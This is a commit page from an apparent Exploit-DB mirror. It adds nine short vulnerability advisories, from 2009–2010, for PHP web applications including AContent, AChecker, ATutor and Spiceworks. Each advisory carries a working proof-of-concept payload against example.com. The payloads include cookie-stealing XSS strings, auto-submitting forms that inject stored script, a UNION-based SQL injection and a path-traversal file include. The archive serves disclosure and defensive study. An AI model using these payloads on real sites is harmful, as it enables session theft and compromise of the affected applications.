bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

Updated 09_14_2014

Browse source
This commit is contained in:
Offensive Security 2014-09-14 04:44:14 +00:00
parent 58cf70abfb
commit e2eef480e2
10 changed files with 143 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9
files.csv
View file

@ -31179,3 +31179,12 @@ id,file,description,date,author,platform,type,port
34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 (index.php, contacts_id param) - SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 (index.php, contacts_id param) - SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80
34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,9900 34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,9900
34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent XSS Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,0 34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent XSS Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,0
34628,platforms/php/webapps/34628.txt,"Santafox 2.0.2 'search' Parameter Cross-Site Scripting Vulnerability",2010-09-06,"High-Tech Bridge SA",php,webapps,0
34629,platforms/php/webapps/34629.txt,"AContent 1.0 Cross Site Scripting and HTML Injection Vulnerabilities",2010-09-15,"High-Tech Bridge SA",php,webapps,0
34630,platforms/php/webapps/34630.txt,"AChecker 1.0 'uri' Parameter Cross-Site Scripting Vulnerability",2010-09-15,"High-Tech Bridge SA",php,webapps,0
34631,platforms/php/webapps/34631.txt,"ATutor 1.0 Multiple 'cid' Parameter Cross-Site Scripting Vulnerabilities",2010-09-15,"High-Tech Bridge SA",php,webapps,0
34632,platforms/php/webapps/34632.txt,"Multi Website 1.5 'search' Parameter HTML Injection Vulnerability",2009-08-06,"599eme Man",php,webapps,0
34633,platforms/php/webapps/34633.txt,"Spiceworks 'query' Parameter Cross Site Scripting Vulnerability",2009-08-08,"Adam Baldwin",php,webapps,0
34634,platforms/php/webapps/34634.txt,"Multple I-Escorts Products 'escorts_search.php' Cross-Site Scripting Vulnerabilities",2010-09-15,"599eme Man",php,webapps,0
34635,platforms/php/webapps/34635.txt,"Willscript Auction Website Script 'category.php' SQL Injection Vulnerability",2009-08-06,"599eme Man",php,webapps,0
34636,platforms/php/webapps/34636.txt,"NWS-Classifieds 'cmd' Parameter Local File Include Vulnerability",2010-09-15,"John Leitch",php,webapps,0

Can't render this file because it is too large.

9
platforms/php/webapps/34628.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43237/info
Santafox is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Santafox 2.02 is vulnerable; other versions may be affected.
http://www.example.com/search.html?search=1"><script>alert(document.cookie)</script>&x=0&y=0

53
platforms/php/webapps/34629.txt Executable file
View file

@ -0,0 +1,53 @@
source: http://www.securityfocus.com/bid/43238/info
AContent is prone to multiple cross-site scripting vulnerabilities and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
AContent 1.0 is vulnerable; prior versions may also be affected.
http://www.example.com/home/search.php?search_text=txt"><script>alert(document.cookie)</script>&catid=&search=Search
<form action="http://www.example.com/home/editor/edit_content.php?_cid=PAGE_ID" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="_course_id" value="54" />
<input type="hidden" name="_cid" value="PAGE_ID" />
<input type="hidden" name="title" value="page title" />
<input type="hidden" name="ordering" value="1" />
<input type="hidden" name="pid" value="0" />
<input type="hidden" name="alternatives" value="" />
<input type="hidden" name="current_tab" value="0" />
<input type="hidden" name="keywords" value="" />
<input type="hidden" name="test_message" value="" />
<input type="submit" name="submit" id="sbmtit" value="Save" />
<input type="hidden" name="displayhead" value="0" />
<input type="hidden" name="displaypaste" value="0" />
<input type="hidden" name="complexeditor" value="1" />
<input type="hidden" name="title" value="atest ah" />
<input type="hidden" name="formatting" value="1" />
<input type="hidden" name="head" value="" />
<input type="hidden" name="uploadedfile_paste" value="" />
<input type="hidden" name="body_text" value='hello world html<script>alert(document.cookie)</script>' />
<input type="hidden" name="weblink_text" value="" />
</form>
<script>
document.getElementById('sbmtit').click();
</script>
<form action="http://www.example.com/home/course/course_property.php?_course_id=COURSE_ID" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="_course_id" value="COURSE_ID" />
<input type="hidden" name="title" value="Creating Lesson in AContent" />
<input type="hidden" name="category_id" value="0" />
<input type="hidden" name="pri_lang" value="en" />
<input type="hidden" name="description" value="Learn how to" />
<input type="hidden" name="copyright" value='1"><script>alert(document.cookie)</script>' />
<input type="submit" name="submit" id="sbmtit" value="Save" />
</form>
<script>
document.getElementById('sbmtit').click();
</script>

18
platforms/php/webapps/34630.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/43240/info
AChecker is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
AChecker 1.0 is vulnerable; other versions may be affected.
<form action="http://www.example.com/index.php" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="uri" value=&#039;http://1"><script>alert(document.cookie)</script>&#039; />
<input type="hidden" name="validate_uri" value="Check It" />
<input type="hidden" name="MAX_FILE_SIZE" value="52428800" />
<input type="hidden" name="uploadfile"; filename="" />
<input type="hidden" name="gid[]" value="8" />
</form>
<script>
document.main.submit();
</script>

11
platforms/php/webapps/34631.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/43241/info
ATutor is prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
ATutor 1.0 is vulnerable, other versions may also be affected.
http://www.example.com/mods/_core/editor/delete_content.php?cid=PAGE_ID"><script>alert(document.cookie)</script>
http://www.example.com/mods/_core/editor/edit_content_folder.php?cid=PAGE_ID"><script>alert(document.cookie)</script>

9
platforms/php/webapps/34632.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43245/info
Multi Website is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Multi Website 1.5 is vulnerable; other versions may also be affected.
http://www.example.com/demo/?action=search&search=%27%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3CMARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3EXss%3C%2FH1%3E%3C%2FMARQUEE%3E&gateway=%E4%E3%D8+%C7%E1%C8%CD%CB&by=words

9
platforms/php/webapps/34633.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43248/info
Spiceworks is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Spiceworks 3.6.33156 and 4.1.39229 are vulnerable; other versions may also be affected.
http://www.example.com/search?query=--%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

9
platforms/php/webapps/34634.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43249/info
Multiple I-Escorts products are prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
I-Escorts Directory Script and I-Escorts Agency Script are vulnerable.
http://www.example.com/demos/escorts-agency/escorts_search.php => Your XSS

7
platforms/php/webapps/34635.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43254/info
Willscript Auction Website Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to execute arbitrary code, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/webtrade/category.php?cate_id=-19%20union%20all%20select%201,version%28

9
platforms/php/webapps/34636.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43259/info
NWS-Classifieds is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
NWS-Classifieds 007 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?cmd=../../../../../../../../windows/system.ini%00